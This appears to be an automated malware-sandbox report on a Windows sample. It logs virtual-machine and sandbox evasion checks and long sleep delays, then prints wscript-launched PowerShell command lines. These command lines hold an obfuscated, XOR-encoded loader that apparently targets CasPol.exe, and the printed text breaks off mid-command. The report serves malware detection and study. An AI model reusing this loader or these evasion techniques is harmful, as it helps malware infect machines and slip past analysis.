Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect Any.run
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\System32\wscript.exe TID: 6996Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2608Thread sleep count: 2484 > 30Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6852Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6852Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8633Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 2484Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: ModuleInformationJump to behavior
Source: wscript.exe, 00000000.00000003.1855777941.000002516CE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852221279.000002516CE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851507505.000002516CE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2153249589.000002516CE76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
Source: wscript.exe, 00000000.00000003.1868669785.000002516AEBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855777941.000002516CE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852221279.000002516CE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1874473366.000002516AED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2152257178.000002516AED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851507505.000002516CE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2153249589.000002516CE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1870241589.000002516CE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852698887.000002516AEAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1870241589.000002516CE76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$boykott = """gefalu cnubclut si goann c tek do enthsrat m0 r2ef s{sa se ch i pap sasarunavem s(sk[jos atpar sivinekg o]ab`$sepreastafotkrrkryupkamnspifonim2 k0th1 a)fl;fi m`$ afhao gnree btbyiflk s1tr3sa4sc se=ka c'bo'kr; t bow tr riastove b-mohbaobrs dt c n`$rafgloson te st si fkle1ea3 p4 n;do lyw srkai ft rekn-inhgro tssttkr ou`$laf iobenexecyt ci nkur1en3ec4ra; s diwsrranirat me p-adhteo osyat j k`$ldffloopn fe ct zinikch1sv3te4st; d a ha m is`$aabhad ze blen2un2su2 e po=pa findreriw c-buoenbvrj ie bcsct u etbteypat pere[en]di sq( a`$fopunaswa ot vr uytik nn hi dnnu2 t0ou1ol.ral ee unovghat rh d a/vi af2 s)ta;co la in k ufshoafr a( c`$sisstptraingud=to0ad; k i`$uls pp uatrgja w- slunt b th`$ upsua taict brupyaak snstistncr2 n0no1ro.selscebrnbeg rtunhre;al t`$ cs uptiapagse+br=to2ol) d{ko t ca lo qu l ma s s`$ tb adglesklfl2dr2br2 c[ c`$fospupfoaargho/ o2 b] v ra=me r[ eczuopunthvude eraltfo]sj:st: bt pokob hy mt fe s(su`$nopkiafiarotinr rysnkdrnpri snfo2sk0 k1 s.sysbeupab bs htupr ii unakgad(de`$brssup uarigin,ra t2el) o, c tr1 i6 l) n;pa s ho`$ fbmadenestlap2 p2 a2co[ve`$rts hp ua ggbo/ s2gi]sp dr=bl m(po`$udbdad we cl q2 n2ec2sk[du`$ ss tp da eg s/hj2 h] s b- sb bx fonorun t1ci5de5an)ek;he ma g ba op}du b[toshotperbli tnpogre]do[exs sy bs st reeumco. pt vetaxtotsa. ceslncicbookedani snstg s] f: i: sa pssmcfrisaist. tg ceantceseltadrmiimun kgun(ch`$ tbomddie ol g2 a2tr2 e) e;ch}sc`$sed seskmheopog c0ar=guk wotvnths ht m0fo2 s mo'grc f8poeeu2 oera8soe ofwbfquefrfsh6 cbha5 mf mf jfwe7tuf h7mi'ud; h`$ ad keraminoxeg s1re=shkdiomonfhs mt m0 k2 m ju' sdta6 rfaf2alf c8meeha9 rfco4 iebl8 sf u4 af sdpeeepf sbld5 lc fcfofde2hofel5taakl8emahi9pabgi5stc te ffhy5 re b8arfuda sfmudrdfsue ld r5smf ha cedkf fffl2 pe bdinfnoefedpi6 ufceeide sfkof o3esf a4sqfwafble p8le'ro;be`$afdhlescmdeomog m2 c=sokino nnbrs btsi0af2om op' vdracprfele he ofcacseb je a9krf i4maffo8 ldsla kfwafpif mfsyest9nofkoecoeva8 veew8 v'di;ra`$ pd uegumako sg l3 i= sk ao en rs ktri0la2un k' scbo8 cefe2emegu8fieshfbufrae pf m6 sbtu5 hcsl9aaetje afpo5 gecyfinf c2mif o6frf meaib d5grd t2 qf n5 cehyf bfsae beov9 cfdi4hjecibbrcse8 bf me vefe9cierid ff s2paf d8 sfkaesle d8lab s5svd s3 ofkoasufin5stfvifjafre7refspesycsk9 bf je tf edso'pa;ov`$hydpeemomchoingko4so= pkfuopan fs ptla0pr2af ja'bue o8 re sfflech9chfbr2taf p5lafnyc p'in;sy`$phd sebemphopag r5kr= okpooren ts stbi0ul2po d' rd gc tfsyeskeaufcodra6 tf p4 pfstfhye we jfkr7 af oefld a3nofrea ffor5 if ff sf b7 nf heye'br;so`$pedameimmkuoragfo6in= ikspobnndes dt u0co2ti fo'mac s9 cc sf scus8ele ub ufgee sfru8jefsp2unfmea ifbo7madka5 afflaunfse6fof oe abrh7vibnob rdvu3bjf b2 rfbifthfzaemudsi9 feud2 cctu8hefti2 ff bc lb t7drbsebpic wbweesueekfha9 efco7nofsp2mefjo8ce' s; m`$ sdaqeorm pobagse7af= ckpro dnreskat k0go2re un' tcru9 peopebaf c5 ae af sf a2laf d6stfanekobbe7dob pbgldsl6 if pa wfre5 uf faaw
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function konst02 { param([string]$paatryknin201); $fonetik134 = ''; write-host $fonetik134; write-host $fonetik134; write-host $fonetik134; $bdel222 = new-object byte[] ($paatryknin201.length / 2); for($spag=0; $spag -lt $paatryknin201.length; $spag+=2){ $bdel222[$spag/2] = [convert]::tobyte($paatryknin201.substring($spag, 2), 16); $bdel222[$spag/2] = ($bdel222[$spag/2] -bxor 155); } [string][system.text.encoding]::ascii.getstring($bdel222);}$demog0=konst02 'c8e2e8effef6b5fff7f7';$demog1=konst02 'd6f2f8e9f4e8f4fdefb5ccf2f5a8a9b5cef5e8fafdfed5faeff2edfed6feeff3f4ffe8';$demog2=konst02 'dcfeefcbe9f4f8daffffe9fee8e8';$demog3=konst02 'c8e2e8effef6b5c9eef5eff2f6feb5d2f5effee9f4ebc8fee9edf2f8fee8b5d3faf5fff7fec9fefd';$demog4=konst02 'e8efe9f2f5fc';$demog5=konst02 'dcfeefd6f4ffeef7fed3faf5fff7fe';$demog6=konst02 'c9cfc8ebfef8f2faf7d5faf6feb7bbd3f2fffed9e2c8f2fcb7bbcbeef9f7f2f8';$demog7=konst02 'c9eef5eff2f6feb7bbd6faf5fafcfeff';$demog8=konst02 'c9fefdf7fef8effeffdffef7fefcfaeffe';$demog9=konst02 'd2f5d6fef6f4e9e2d6f4ffeef7fe';$elevatorfo0=konst02 'd6e2dffef7fefcfaeffecfe2ebfe';$elevatorfo1=konst02 'd8f7fae8e8b7bbcbeef9f7f2f8b7bbc8fefaf7feffb7bbdaf5e8f2d8f7fae8e8b7bbdaeeeff4d8f7fae8e8';$elevatorfo2=konst02 'd2f5edf4f0fe';$elevatorfo3=konst02 'cbeef9f7f2f8b7bbd3f2fffed9e2c8f2fcb7bbd5feecc8f7f4efb7bbcdf2e9efeefaf7';$elevatorfo4=konst02 'cdf2e9efeefaf7daf7f7f4f8';$elevatorfo5=konst02 'f5effff7f7';$elevatorfo6=konst02 'd5efcbe9f4effef8efcdf2e9efeefaf7d6fef6f4e9e2';$elevatorfo7=konst02 'd2dec3';$elevatorfo8=konst02 'c7';$vattppe=konst02 'cec8dec9a8a9';$deviledj=konst02 'd8faf7f7ccf2f5fff4eccbe9f4f8da';function fkp {param ($kominternf, $back) ;$faggrupp0 =konst02 'bfcdfae9f6f9bba6bbb3c0daebebdff4f6faf2f5c6a1a1d8eee9e9fef5efdff4f6faf2f5b5dcfeefdae8e8fef6f9f7f2fee8b3b2bbe7bbccf3fee9feb6d4f9f1fef8efbbe0bbbfc4b5dcf7f4f9faf7dae8e8fef6f9f7e2d8faf8f3febbb6daf5ffbbbfc4b5d7f4f8faeff2f4f5b5c8ebf7f2efb3bfdef7feedfaeff4e9fdf4a3b2c0b6aac6b5deeaeefaf7e8b3bfdffef6f4fcabb2bbe6b2b5dcfeefcfe2ebfeb3bfdffef6f4fcaab2';&($elevatorfo7) $faggrupp0;$faggrupp5 = konst02 'bfddf7fafcfcfef7bba6bbbfcdfae9f6f9b5dcfeefd6feeff3f4ffb3bfdffef6f4fca9b7bbc0cfe2ebfec0c6c6bbdbb3bfdffef6f4fca8b7bbbfdffef6f4fcafb2b2';&($elevatorfo7) $faggrupp5;$faggrupp1 = konst02 'e9feefeee9f5bbbfddf7fafcfcfef7b5d2f5edf4f0feb3bff5eef7f7b7bbdbb3c0c8e2e8effef6b5c9eef5eff2f6feb5d2f5effee9f4ebc8fee9edf2f8fee8b5d3faf5fff7fec9fefdc6b3d5feecb6d4f9f1fef8efbbc8e2e8effef6b5c9eef5eff2f6feb5d2f5effee9f4ebc8fee9edf2f8fee8b5d3faf5fff7fec9fefdb3b3d5feecb6d4f9f1fef8efbbd2f5efcbefe9b2b7bbb3bfcdfae9f6f9b5dcfeefd6feeff3f4ffb3bfdffef6f4fcaeb2b2b5d2f5edf4f0feb3bff5eef7f7b7bbdbb3bfd0f4f6f2f5effee9f5fdb2b2b2b2b7bbbfd9faf8f0b2b2';&($elevatorfo7) $faggrupp1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $medicof,[parameter(position = 1)] [type] $medplanbli = [void]);$faggru
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$boykott = """gefalu cnubclut si goann c tek do enthsrat m0 r2ef s{sa se ch i pap sasarunavem s(sk[jos atpar sivinekg o]ab`$sepreastafotkrrkryupkamnspifonim2 k0th1 a)fl;fi m`$ afhao gnree btbyiflk s1tr3sa4sc se=ka c'bo'kr; t bow tr riastove b-mohbaobrs dt c n`$rafgloson te st si fkle1ea3 p4 n;do lyw srkai ft rekn-inhgro tssttkr ou`$laf iobenexecyt ci nkur1en3ec4ra; s diwsrranirat me p-adhteo osyat j k`$ldffloopn fe ct zinikch1sv3te4st; d a ha m is`$aabhad ze blen2un2su2 e po=pa findreriw c-buoenbvrj ie bcsct u etbteypat pere[en]di sq( a`$fopunaswa ot vr uytik nn hi dnnu2 t0ou1ol.ral ee unovghat rh d a/vi af2 s)ta;co la in k ufshoafr a( c`$sisstptraingud=to0ad; k i`$uls pp uatrgja w- slunt b th`$ upsua taict brupyaak snstistncr2 n0no1ro.selscebrnbeg rtunhre;al t`$ cs uptiapagse+br=to2ol) d{ko t ca lo qu l ma s s`$ tb adglesklfl2dr2br2 c[ c`$fospupfoaargho/ o2 b] v ra=me r[ eczuopunthvude eraltfo]sj:st: bt pokob hy mt fe s(su`$nopkiafiarotinr rysnkdrnpri snfo2sk0 k1 s.sysbeupab bs htupr ii unakgad(de`$brssup uarigin,ra t2el) o, c tr1 i6 l) n;pa s ho`$ fbmadenestlap2 p2 a2co[ve`$rts hp ua ggbo/ s2gi]sp dr=bl m(po`$udbdad we cl q2 n2ec2sk[du`$ ss tp da eg s/hj2 h] s b- sb bx fonorun t1ci5de5an)ek;he ma g ba op}du b[toshotperbli tnpogre]do[exs sy bs st reeumco. pt vetaxtotsa. ceslncicbookedani snstg s] f: i: sa pssmcfrisaist. tg ceantceseltadrmiimun kgun(ch`$ tbomddie ol g2 a2tr2 e) e;ch}sc`$sed seskmheopog c0ar=guk wotvnths ht m0fo2 s mo'grc f8poeeu2 oera8soe ofwbfquefrfsh6 cbha5 mf mf jfwe7tuf h7mi'ud; h`$ ad keraminoxeg s1re=shkdiomonfhs mt m0 k2 m ju' sdta6 rfaf2alf c8meeha9 rfco4 iebl8 sf u4 af sdpeeepf sbld5 lc fcfofde2hofel5taakl8emahi9pabgi5stc te ffhy5 re b8arfuda sfmudrdfsue ld r5smf ha cedkf fffl2 pe bdinfnoefedpi6 ufceeide sfkof o3esf a4sqfwafble p8le'ro;be`$afdhlescmdeomog m2 c=sokino nnbrs btsi0af2om op' vdracprfele he ofcacseb je a9krf i4maffo8 ldsla kfwafpif mfsyest9nofkoecoeva8 veew8 v'di;ra`$ pd uegumako sg l3 i= sk ao en rs ktri0la2un k' scbo8 cefe2emegu8fieshfbufrae pf m6 sbtu5 hcsl9aaetje afpo5 gecyfinf c2mif o6frf meaib d5grd t2 qf n5 cehyf bfsae beov9 cfdi4hjecibbrcse8 bf me vefe9cierid ff s2paf d8 sfkaesle d8lab s5svd s3 ofkoasufin5stfvifjafre7refspesycsk9 bf je tf edso'pa;ov`$hydpeemomchoingko4so= pkfuopan fs ptla0pr2af ja'bue o8 re sfflech9chfbr2taf p5lafnyc p'in;sy`$phd sebemphopag r5kr= okpooren ts stbi0ul2po d' rd gc tfsyeskeaufcodra6 tf p4 pfstfhye we jfkr7 af oefld a3nofrea ffor5 if ff sf b7 nf heye'br;so`$pedameimmkuoragfo6in= ikspobnndes dt u0co2ti fo'mac s9 cc sf scus8ele ub ufgee sfru8jefsp2unfmea ifbo7madka5 afflaunfse6fof oe abrh7vibnob rdvu3bjf b2 rfbifthfzaemudsi9 feud2 cctu8hefti2 ff bc lb t7drbsebpic wbweesueekfha9 efco7nofsp2mefjo8ce' s; m`$ sdaqeorm pobagse7af= ckpro dnreskat k0go2re un' tcru9 peopebaf c5 ae af sf a2laf d6stfanekobbe7dob pbgldsl6 if pa wfre5 uf faawJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function konst02 { param([string]$paatryknin201); $fonetik134 = ''; write-host $fonetik134; write-host $fonetik134; write-host $fonetik134; $bdel222 = new-object byte[] ($paatryknin201.length / 2); for($spag=0; $spag -lt $paatryknin201.length; $spag+=2){ $bdel222[$spag/2] = [convert]::tobyte($paatryknin201.substring($spag, 2), 16); $bdel222[$spag/2] = ($bdel222[$spag/2] -bxor 155); } [string][system.text.encoding]::ascii.getstring($bdel222);}$demog0=konst02 'c8e2e8effef6b5fff7f7';$demog1=konst02 'd6f2f8e9f4e8f4fdefb5ccf2f5a8a9b5cef5e8fafdfed5faeff2edfed6feeff3f4ffe8';$demog2=konst02 'dcfeefcbe9f4f8daffffe9fee8e8';$demog3=konst02 'c8e2e8effef6b5c9eef5eff2f6feb5d2f5effee9f4ebc8fee9edf2f8fee8b5d3faf5fff7fec9fefd';$demog4=konst02 'e8efe9f2f5fc';$demog5=konst02 'dcfeefd6f4ffeef7fed3faf5fff7fe';$demog6=konst02 'c9cfc8ebfef8f2faf7d5faf6feb7bbd3f2fffed9e2c8f2fcb7bbcbeef9f7f2f8';$demog7=konst02 'c9eef5eff2f6feb7bbd6faf5fafcfeff';$demog8=konst02 'c9fefdf7fef8effeffdffef7fefcfaeffe';$demog9=konst02 'd2f5d6fef6f4e9e2d6f4ffeef7fe';$elevatorfo0=konst02 'd6e2dffef7fefcfaeffecfe2ebfe';$elevatorfo1=konst02 'd8f7fae8e8b7bbcbeef9f7f2f8b7bbc8fefaf7feffb7bbdaf5e8f2d8f7fae8e8b7bbdaeeeff4d8f7fae8e8';$elevatorfo2=konst02 'd2f5edf4f0fe';$elevatorfo3=konst02 'cbeef9f7f2f8b7bbd3f2fffed9e2c8f2fcb7bbd5feecc8f7f4efb7bbcdf2e9efeefaf7';$elevatorfo4=konst02 'cdf2e9efeefaf7daf7f7f4f8';$elevatorfo5=konst02 'f5effff7f7';$elevatorfo6=konst02 'd5efcbe9f4effef8efcdf2e9efeefaf7d6fef6f4e9e2';$elevatorfo7=konst02 'd2dec3';$elevatorfo8=konst02 'c7';$vattppe=konst02 'cec8dec9a8a9';$deviledj=konst02 'd8faf7f7ccf2f5fff4eccbe9f4f8da';function fkp {param ($kominternf, $back) ;$faggrupp0 =konst02 'bfcdfae9f6f9bba6bbb3c0daebebdff4f6faf2f5c6a1a1d8eee9e9fef5efdff4f6faf2f5b5dcfeefdae8e8fef6f9f7f2fee8b3b2bbe7bbccf3fee9feb6d4f9f1fef8efbbe0bbbfc4b5dcf7f4f9faf7dae8e8fef6f9f7e2d8faf8f3febbb6daf5ffbbbfc4b5d7f4f8faeff2f4f5b5c8ebf7f2efb3bfdef7feedfaeff4e9fdf4a3b2c0b6aac6b5deeaeefaf7e8b3bfdffef6f4fcabb2bbe6b2b5dcfeefcfe2ebfeb3bfdffef6f4fcaab2';&($elevatorfo7) $faggrupp0;$faggrupp5 = konst02 'bfddf7fafcfcfef7bba6bbbfcdfae9f6f9b5dcfeefd6feeff3f4ffb3bfdffef6f4fca9b7bbc0cfe2ebfec0c6c6bbdbb3bfdffef6f4fca8b7bbbfdffef6f4fcafb2b2';&($elevatorfo7) $faggrupp5;$faggrupp1 = konst02 'e9feefeee9f5bbbfddf7fafcfcfef7b5d2f5edf4f0feb3bff5eef7f7b7bbdbb3c0c8e2e8effef6b5c9eef5eff2f6feb5d2f5effee9f4ebc8fee9edf2f8fee8b5d3faf5fff7fec9fefdc6b3d5feecb6d4f9f1fef8efbbc8e2e8effef6b5c9eef5eff2f6feb5d2f5effee9f4ebc8fee9edf2f8fee8b5d3faf5fff7fec9fefdb3b3d5feecb6d4f9f1fef8efbbd2f5efcbefe9b2b7bbb3bfcdfae9f6f9b5dcfeefd6feeff3f4ffb3bfdffef6f4fcaeb2b2b5d2f5edf4f0feb3bff5eef7f7b7bbdbb3bfd0f4f6f2f5effee9f5fdb2b2b2b2b7bbbfd9faf8f0b2b2';&($elevatorfo7) $faggrupp1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $medicof,[parameter(position = 1)] [type] $medplanbli = [void]);$faggruJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /flushdnsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /k echo hellJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog 